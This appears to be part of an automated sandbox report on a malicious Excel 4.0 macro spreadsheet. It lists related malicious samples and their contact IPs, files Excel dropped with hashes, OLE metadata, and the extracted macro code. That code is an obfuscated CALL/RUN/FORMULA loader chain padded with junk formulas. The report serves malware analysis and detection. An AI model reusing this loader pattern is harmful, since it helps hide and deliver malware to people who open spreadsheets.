                                                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                                                      SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                                                      • 192.185.39.58

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2ECD44E8-C9E6-4D87-BE35-E1612EC8869C
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):134558
                                                                                                                                                                                                                      Entropy (8bit):5.368375532026078
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:ecQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:9EQ9DQW+zPXO8
                                                                                                                                                                                                                      MD5:D163B1B0865C48F11659A40C6C4DF422
                                                                                                                                                                                                                      SHA1:22A031300CD660C38C4AA218C911514183D71396
                                                                                                                                                                                                                      SHA-256:E6A61378AC40B61090583F511730B38121332228F5D6D3DE40A787957B953AF6
                                                                                                                                                                                                                      SHA-512:31140EB40A4026618B2EA29F9EAD148AB36FF9A5EE5A4EBE638154E48DDF743DAC67353E6C7AFB4FB6F291C8FAD771866CD1C122E070E8FDB06BB2E39AA92495
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T19:14:12">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\4AC10000
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):81553
                                                                                                                                                                                                                      Entropy (8bit):7.910299376985252
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:N9jYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJPE6:D+nHSD8YZo/Uh0ZymYQ0y7FALe6
                                                                                                                                                                                                                      MD5:4D38AF167E454CFCEB7051B3F9D04417
                                                                                                                                                                                                                      SHA1:1E51B9EB33BDFD31A67EA4EFE768BAD1C3604089
                                                                                                                                                                                                                      SHA-256:00D5BE6C64ECE69DFF8A36F22E90AABC1B305AF854338B65F5A3A5E550AE9761
                                                                                                                                                                                                                      SHA-512:132CA2699C5008E3026890591AF7534AC5CE249768F8322CA9DC3908FC3329F13E09F5D72218E567183DFCC4E58EB973A1B80E3654AA31DE25A410E3B60CF07C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\85095f36_by_Libranalysis.LNK
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:24:17 2020, mtime=Thu May 13 03:14:15 2021, atime=Thu May 13 03:14:15 2021, length=177152, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2282
                                                                                                                                                                                                                      Entropy (8bit):4.710095636853695
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:8eEnPuOE4UYsNeOECoB6peEnPuOE4UYsNeOECoB6:85mFKsNeFHK5mFKsNeFH
                                                                                                                                                                                                                      MD5:C7005A704D2FB95745D8DB98DA25C798
                                                                                                                                                                                                                      SHA1:75ED9B70951ED64DBC7F6DEB141186D2A6129892
                                                                                                                                                                                                                      SHA-256:213251961F0F8368357279C251E5A039E3DDFA84D4E7782332A351F438AAE84D
                                                                                                                                                                                                                      SHA-512:2687C82674171B87B3696D699EDD11F499561D3C42AD73439BA6842A364AF62AC269A6DE77E29D96376F3B47816E050BC03AD81DCBA0F74CB271D849C9755DE7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: L..................F.... .......=...K8.o.G..K8.o.G...............................P.O. .:i.....+00.../C:\...................x.1......N...Users.d......L...R.!....................:.......1.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\.1.....>Q.{..user~1..D.......N...R.!.....S....................5...f.r.o.n.t.d.e.s.k.....~.1.....>Q.{..Desktop.h.......N...R.!.....Y..............>.....eG..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.! .85095F~1.XLS..j......>Q.{.R.!....WA....................8...8.5.0.9.5.f.3.6._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......f...............-.......e...........>.S......C:\Users\user\Desktop\85095f36_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.8.5.0.9.5.f.3.6._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...A....`.......X.......226533...........!a..%.H.VZAj....S..0............!a..%.H.VZAj....S..0.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 19:05:17 2019, mtime=Thu May 13 03:14:15 2021, atime=Thu May 13 03:14:15 2021, length=12288, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):920
                                                                                                                                                                                                                      Entropy (8bit):4.674719994764259
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:8WWcDUCZeCHqqGm013kXeMhm89Q+WMEjAt/rbDKTb1e0b1eZ44t2Y+xIBjKZm:8WWQV013WUqQAtvDKmw7aB6m
                                                                                                                                                                                                                      MD5:973B9490CB522985CD0C6A42BB22B33C
                                                                                                                                                                                                                      SHA1:252D0CA54B4CADF7DD9ED0027E6928F0391AA346
                                                                                                                                                                                                                      SHA-256:DC29E140AD5EEFFB07497288F6613586AD2B038F558035D1071D3E69DA321049
                                                                                                                                                                                                                      SHA-512:68240AFA363191777B77B91A69974162FA09574DF9B12766237F0FE26BE20ECC1F376860CA19CE833D64096927BC47329DF1987B9CC9F65D8FD53FFDAB8F3467
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: L..................F........)...#-..s%.o.G..&..o.G...0...........................P.O. .:i.....+00.../C:\...................x.1......N...Users.d......L...R.!....................:.......1.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\.1.....>Q.{..user~1..D.......N...R.!.....S....................5...f.r.o.n.t.d.e.s.k.....~.1......R.!..Desktop.h.......N...R.!.....Y..............>.......2.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......I...............-.......H...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A....`.......X.......226533...........!a..%.H.VZAj...8T...............!a..%.H.VZAj...8T..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):136
                                                                                                                                                                                                                      Entropy (8bit):4.825125662486227
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:bDesBVomMFQViCGUwSLMp6luiCGUwSLMp6lmMFQViCGUwSLMp6lv:bSsj6FQsChNeiChNbFQsChNf
                                                                                                                                                                                                                      MD5:C093AF019A1C3F8706657DACCE797D82
                                                                                                                                                                                                                      SHA1:CE6DA4D539F1C6E07CE234C7FFC56932A5AB346B
                                                                                                                                                                                                                      SHA-256:10428BD9B7129AB405CB9FA0D164CF0645B7C7FC06D1B3882CF0551406EE8B95
                                                                                                                                                                                                                      SHA-512:06635DD134A0DB752B2E4E2198B0882FA01BA46CD8413AFC80119A17E9DCDEF46816388622349C179D37F332DEFB11ED1C7799BB1D0825DC5151BCE4BDF44E92
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: [folders]..Desktop.LNK=0..[xls]..85095f36_by_Libranalysis.LNK=0..85095f36_by_Libranalysis.LNK=0..[xls]..85095f36_by_Libranalysis.LNK=0..
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                                      C:\Users\user\Desktop\3BC10000
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):228873
                                                                                                                                                                                                                      Entropy (8bit):5.616594673155463
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:57NiRdSD8YNoTU90u5fzn3bW0X7vrPlsrXvLlL7L+7NiuJ:+RdTrTU9ZQ/uJ
                                                                                                                                                                                                                      MD5:5CD0B37848F5BA53896F036BC52F5823
                                                                                                                                                                                                                      SHA1:3868D1E1EEB7803F79E1EBF5741EAF9F7E6A3772
                                                                                                                                                                                                                      SHA-256:53B6107D1F6EF82AF1014BD20456767BBC812BDC9C16BD9F4FE6E19B82059FF5
                                                                                                                                                                                                                      SHA-512:EBE73A3527FB9D7AF99A6C9B3B0A84252089E9C5726E1C69A9233F7AECCFF15A89DE6449F7DFCE56348CD058BCDD46CE89F644BA887C8DBE51AC51791B9B48C9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................9..C.a.l.i.b.r.i.1................9..A.r.i.a.l.1................9..A.r.i.a.l.1................9..A.r.i.a.l.1................9..C.a.l.i.b.r.i.1...,...8........9..A.r.i.a.l.1.......8........9..A.r.i.a.l.1.......8........9..A.r.i.a.l.1.......<........9..A.r.i.a.l.1.......4........9..A.r.i.a.l.1.......4........9..A.r.i.a.l.1...h...8........9..C.a.m.b.r.i.a.1................9..C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                                                                                      Entropy (8bit):3.258986427712615
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                                      File name:85095f36_by_Libranalysis.xls
                                                                                                                                                                                                                      File size:375808
                                                                                                                                                                                                                      MD5:85095f36d19d0a0cc635a9e255730ea0
                                                                                                                                                                                                                      SHA1:8ec5f0d784134f08bce52949027a686cd099acd8
                                                                                                                                                                                                                      SHA256:a4a5606ff24d70f51f72a501a370ab2199548d4d3a88e904cb9cfafb824d8af2
                                                                                                                                                                                                                      SHA512:b95d86d75bc04d974061657cc4183c117f3a6b88ea21fb3d7e30ce1631bd8cd92928990954d9bf669d68a16b7748ca7d43246abd445fddbd29e898720c7d14d1
                                                                                                                                                                                                                      SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc9:vUGAt6Uqa5DPdG9uS9QLp4l+s+I8
                                                                                                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                                      Static OLE Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Document Type:OLE
                                                                                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                                                                                      OLE File "85095f36_by_Libranalysis.xls"

                                                                                                                                                                                                                      Indicators

                                                                                                                                                                                                                      Has Summary Info:True
                                                                                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                                                                                      Encrypted Document:False
                                                                                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                                                                                      Summary

                                                                                                                                                                                                                      Code Page:1251
                                                                                                                                                                                                                      Author:van-van
                                                                                                                                                                                                                      Last Saved By:vi-vi
                                                                                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                                      Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                                                                                      Security:0

                                                                                                                                                                                                                      Document Summary

                                                                                                                                                                                                                      Document Code Page:1251
                                                                                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                                                                                      Contains Dirty Links:False

                                                                                                                                                                                                                      Streams

                                                                                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                      General
                                                                                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Stream Size:4096
                                                                                                                                                                                                                      Entropy:0.287037498961
                                                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                      General
                                                                                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Stream Size:4096
                                                                                                                                                                                                                      Entropy:0.290777742057
                                                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                                                                      Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                                                                                      General
                                                                                                                                                                                                                      Stream Path:Book
                                                                                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                                                                      Stream Size:363283
                                                                                                                                                                                                                      Entropy:3.24522262131
                                                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                                                      Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                                                                      Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                                                                                      CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                                                                                      
                                                                                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=S